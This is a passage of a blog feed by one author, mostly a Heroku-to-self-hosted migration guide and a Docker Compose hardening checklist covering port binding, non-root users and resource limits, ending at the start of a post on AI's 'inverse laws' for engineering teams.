        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;ssh deploy@your-server "cd /app &amp;amp;&amp;amp; git pull &amp;amp;&amp;amp; docker compose up -d --build"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now &lt;code&gt;git push&lt;/code&gt; deploys — same as Heroku.&lt;/p&gt;
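&lt;p&gt;That workflow assumes CI can SSH into the box. The one-time key setup, sketched (the filename and where you store each half are up to you):&lt;/p&gt;

```shell
# Sketch: generate a dedicated deploy key for CI (no passphrase).
ssh-keygen -t ed25519 -f deploy_key -N '' -C 'ci-deploy' -q
# deploy_key.pub is appended to ~deploy/.ssh/authorized_keys on the server;
# deploy_key (the private half) becomes a CI secret used by the ssh step.
head -c 11 deploy_key.pub   # sanity check: key type prefix
```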

&lt;h3&gt;
  
  
  Step 3: Flip DNS
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Update your domain's A record to the new server IP&lt;/span&gt;
&lt;span class="c"&gt;# TTL: start at 60 seconds, increase after verification&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Monitor for 48 hours
&lt;/h3&gt;

&lt;p&gt;Keep Heroku running for 48 hours as rollback. Watch:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Response times (should be same or faster)&lt;/li&gt;
&lt;li&gt;Error rates&lt;/li&gt;
&lt;li&gt;Database connections&lt;/li&gt;
&lt;li&gt;Memory/CPU usage&lt;/li&gt;
&lt;/ul&gt;
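&lt;p&gt;A crude response-time check for the watch window, assuming &lt;code&gt;curl&lt;/code&gt; on the box and the &lt;code&gt;/health&lt;/code&gt; endpoint from earlier (the domain is a placeholder):&lt;/p&gt;

```shell
# Sketch: print HTTP status and total request time for one health check.
probe() {
  curl -s -o /dev/null -w '%{http_code} %{time_total}s\n' "$1"
}
# During the 48-hour window, run it on a loop, e.g.:
#   while true; do probe https://your-domain.com/health; sleep 60; done
```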

&lt;h2&gt;
  
  
  What You Keep
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Heroku Feature&lt;/th&gt;
&lt;th&gt;Self-Hosted Equivalent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;git push&lt;/code&gt; deploy&lt;/td&gt;
&lt;td&gt;CI/CD pipeline (2 minutes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-SSL (ACM)&lt;/td&gt;
&lt;td&gt;Traefik + Let's Encrypt (automatic)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rollbacks&lt;/td&gt;
&lt;td&gt;Check out the previous commit, then &lt;code&gt;docker compose up -d --build&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logging&lt;/td&gt;
&lt;td&gt;Loki + Grafana (better than Papertrail)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Metrics&lt;/td&gt;
&lt;td&gt;Prometheus + Grafana (better than Scout)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scaling&lt;/td&gt;
&lt;td&gt;Docker Compose replicas&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
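&lt;p&gt;The rollback row is worth spelling out: a rollback is just deploying an older commit. A sketch against a throwaway repo (on the real server, the checkout is followed by &lt;code&gt;docker compose up -d --build&lt;/code&gt;):&lt;/p&gt;

```shell
# Sketch: rollback = check out the last good commit, then rebuild.
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git -c user.email=ops@example.com -c user.name=ops commit -q --allow-empty -m 'v1'
git -c user.email=ops@example.com -c user.name=ops commit -q --allow-empty -m 'v2 (bad release)'
git checkout -q HEAD~1            # step back one release
git log -n 1 --format='%s'        # confirm where we landed: v1
```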

&lt;h2&gt;
  
  
  What You Gain
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full control&lt;/strong&gt; — no vendor can change pricing under you&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;10x capacity headroom&lt;/strong&gt; — a $15/month server handles more than 4 Heroku dynos&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Better debugging&lt;/strong&gt; — SSH into the box, inspect everything&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No add-on tax&lt;/strong&gt; — every Heroku add-on has a free self-hosted alternative&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  When NOT to Self-Host
&lt;/h2&gt;

&lt;p&gt;Be honest with yourself:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No ops experience and no budget to learn:&lt;/strong&gt; Stay on PaaS until you have someone who can SSH into a server confidently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance requirements:&lt;/strong&gt; Some industries require specific cloud certifications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;True auto-scaling needs:&lt;/strong&gt; If you go from 100 to 100,000 requests in seconds, managed infrastructure is worth it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For the other 90% of startups: you're overpaying for convenience you've already outgrown.&lt;/p&gt;

&lt;h2&gt;
  
  
  Free Migration Assessment
&lt;/h2&gt;

&lt;p&gt;Not sure if migration makes sense for your stack? We'll review your current Heroku/Render setup, estimate your self-hosted costs, and give you an honest recommendation in 15 minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a call:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>The 5-Minute Docker Compose Security Checklist We Run for Every Client</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Fri, 08 May 2026 06:00:06 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/the-5-minute-docker-compose-security-checklist-we-run-for-every-client-a31</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/the-5-minute-docker-compose-security-checklist-we-run-for-every-client-a31</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/docker-compose-security-checklist-5-minutes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  The 5-Minute Docker Compose Security Checklist We Run for Every Client
&lt;/h1&gt;

&lt;p&gt;We've reviewed Docker Compose configurations for over 30 startups. These three security holes appear in every single one. Without exception.&lt;/p&gt;

&lt;p&gt;They're trivial to fix. Most teams just never get around to it, because nobody flags the problem until something goes wrong.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hole #1: Ports Bound to 0.0.0.0
&lt;/h2&gt;

&lt;p&gt;The most common Docker Compose pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;5432:5432"&lt;/span&gt;  &lt;span class="c1"&gt;# ← This is 0.0.0.0:5432&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That &lt;code&gt;"5432:5432"&lt;/code&gt; is shorthand for &lt;code&gt;"0.0.0.0:5432:5432"&lt;/code&gt;. Your database is now accessible from every network interface — including the public internet if your host has a public IP.&lt;/p&gt;

&lt;p&gt;We've seen production Postgres instances exposed to the internet with default credentials. One client's exposed Redis instance was hijacked to mine crypto for three days before anyone noticed.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:5432:5432"&lt;/span&gt;  &lt;span class="c1"&gt;# ← Only accessible from localhost&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For services that only talk to each other via Docker network, remove the port binding entirely:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="c1"&gt;# No ports section at all — only reachable via Docker internal DNS&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Rule:&lt;/strong&gt; Only expose ports you need from outside Docker. If the service is internal-only, don't map it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hole #2: Running as Root
&lt;/h2&gt;

&lt;p&gt;Check your running containers right now:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose &lt;span class="nb"&gt;exec &lt;/span&gt;app &lt;span class="nb"&gt;whoami&lt;/span&gt;
&lt;span class="c"&gt;# Output: root&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If an attacker achieves container escape (CVE-2024-21626 in runc, for example), they land on the host as root. Full control. Game over.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What each line does:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;user: "1000:1000"&lt;/code&gt; — runs as non-root UID&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;no-new-privileges&lt;/code&gt; — prevents privilege escalation via setuid binaries&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;read_only: true&lt;/code&gt; — container filesystem is immutable&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;tmpfs: /tmp&lt;/code&gt; — gives the app a writable temp directory without persistent write access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Common objection:&lt;/strong&gt; "My app needs to write files." Use volumes for specific writable paths. Don't give the entire filesystem write access.&lt;/p&gt;
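&lt;p&gt;A sketch of that pattern: read-only root filesystem, with exactly one writable mount (the path and volume name are illustrative):&lt;/p&gt;

```yaml
services:
  app:
    image: myapp:latest
    user: "1000:1000"
    read_only: true
    tmpfs:
      - /tmp
    volumes:
      - uploads:/app/storage   # the single path the app may write to

volumes:
  uploads:
```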

&lt;h2&gt;
  
  
  Hole #3: No Resource Limits
&lt;/h2&gt;

&lt;p&gt;Without limits, a single container with a memory leak eats the entire host:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Container using 14GB on a 16GB host&lt;/span&gt;
docker stats &lt;span class="nt"&gt;--no-stream&lt;/span&gt;
CONTAINER  CPU %  MEM USAGE / LIMIT     MEM %
app        340%   14.2GiB / 15.6GiB     91.03%
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When this happens, the OOM killer starts murdering other containers. Your database goes down. Your monitoring goes down. Everything cascades.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;512M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;1.0'&lt;/span&gt;
        &lt;span class="na"&gt;reservations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;0.25'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Limits&lt;/strong&gt; = hard ceiling. Container gets OOM-killed if it exceeds this.&lt;br&gt;
&lt;strong&gt;Reservations&lt;/strong&gt; = guaranteed minimum. Docker won't schedule other work into this space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Set memory limit at 2x your app's normal working set. If your Node.js app uses 200MB normally, set limit to 512M. Enough headroom for spikes, tight enough to prevent runaway.&lt;/p&gt;
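&lt;p&gt;The arithmetic as a quick sketch (the observed working set comes from &lt;code&gt;docker stats&lt;/code&gt; under normal load):&lt;/p&gt;

```shell
# Sketch: turn an observed working set into a tidy compose memory limit.
working_set_mb=200              # steady-state usage seen in `docker stats`
target=$((working_set_mb * 2))  # the 2x rule
# Round up to the next common size so limits stay readable.
for size in 256 512 1024 2048 4096; do
  if [ "$target" -le "$size" ]; then
    echo "memory: ${size}M"   # → memory: 512M for a 200MB working set
    break
  fi
done
```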
&lt;h2&gt;
  
  
  The Complete Hardened Template
&lt;/h2&gt;

&lt;p&gt;Here's our baseline &lt;code&gt;docker-compose.yml&lt;/code&gt; security config that we apply to every project:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;cap_add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;NET_BIND_SERVICE&lt;/span&gt;  &lt;span class="c1"&gt;# Only if binding port &amp;lt;1024&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;512M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;1.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="c1"&gt;# No port binding — reverse proxy handles external access&lt;/span&gt;

  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16-alpine&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;999:999"&lt;/span&gt;  &lt;span class="c1"&gt;# postgres user UID&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;pgdata:/var/lib/postgresql/data&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/run/postgresql&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;2.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="c1"&gt;# No ports exposed — app connects via Docker DNS&lt;/span&gt;

  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0:443:443"&lt;/span&gt;   &lt;span class="c1"&gt;# Only HTTPS exposed publicly&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:8080:8080"&lt;/span&gt;  &lt;span class="c1"&gt;# Dashboard localhost only&lt;/span&gt;
    &lt;span class="c1"&gt;# ... rest of config&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Bonus: Automated Scanning
&lt;/h2&gt;

&lt;p&gt;Add this to your CI to catch these issues before deploy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install docker-compose-linter&lt;/span&gt;
pip &lt;span class="nb"&gt;install &lt;/span&gt;docker-compose-linter

&lt;span class="c"&gt;# Scan for security issues&lt;/span&gt;
docker-compose-lint &lt;span class="nt"&gt;--security&lt;/span&gt; docker-compose.yml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use Trivy's misconfiguration scanner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trivy config docker-compose.yml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  How We Can Help
&lt;/h2&gt;

&lt;p&gt;We run free 15-minute Docker security reviews. Share your &lt;code&gt;docker-compose.yml&lt;/code&gt; (redact credentials), and we'll tell you exactly what's exposed, what's at risk, and how to fix it.&lt;/p&gt;

&lt;p&gt;No pitch. Just fixes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a review:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>

      <title>The Three Inverse Laws of AI: What Every Engineering Team Needs to Know Before It's Too Late</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:48 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/the-three-inverse-laws-of-ai-what-every-engineering-team-needs-to-know-before-its-too-late-3i1n</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/the-three-inverse-laws-of-ai-what-every-engineering-team-needs-to-know-before-its-too-late-3i1n</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/three-inverse-laws-ai-engineering-teams" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  The Three Inverse Laws of AI: What Every Engineering Team Needs to Know
&lt;/h1&gt;

&lt;p&gt;This concept recently hit the top of Hacker News, and it crystallizes something we've been seeing with our own AI infrastructure for months.&lt;/p&gt;

&lt;p&gt;The three inverse laws:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The more AI helps you write code, the harder it becomes to understand what you shipped.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The more AI automates testing, the less your team knows when something is actually broken.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The more AI handles operations, the worse your incident response becomes when AI itself fails.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;These aren't philosophical concerns. They're operational risks that scale with your AI adoption.&lt;/p&gt;

&lt;h2&gt;
  
  
  Law 1: The Comprehension Inverse
&lt;/h2&gt;

&lt;p&gt;A startup we work with shipped 3x faster last quarter using AI-assisted coding. Their velocity metrics looked elite. Then they hit a production bug in AI-generated code — a subtle race condition in a connection pooling layer that no human on the team had written or reviewed deeply.&lt;/p&gt;

&lt;p&gt;Debugging took 4 days instead of 4 hours. The code worked perfectly in isolation and passed all of its AI-generated tests. But it hadn't been shaped by any human's mental model, and nobody on the team could trace the logic path that led to the race condition.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mandatory domain-context code review.&lt;/strong&gt; Not syntax review — domain review. For every AI-generated module, one human must be able to explain:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Why this approach was chosen over alternatives&lt;/li&gt;
&lt;li&gt;What the failure modes are&lt;/li&gt;
&lt;li&gt;How it interacts with adjacent systems&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If nobody can answer those questions, the code isn't ready for production — regardless of how clean it looks.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Code review checklist for AI-generated code
&lt;/span&gt;&lt;span class="n"&gt;REVIEW_QUESTIONS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Can you explain the algorithm without reading the code?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;What happens when the database is slow?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;What happens when the input is 10x larger than expected?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Where does this code store state, and what happens on restart?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;If this breaks at 3am, what would you check first?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
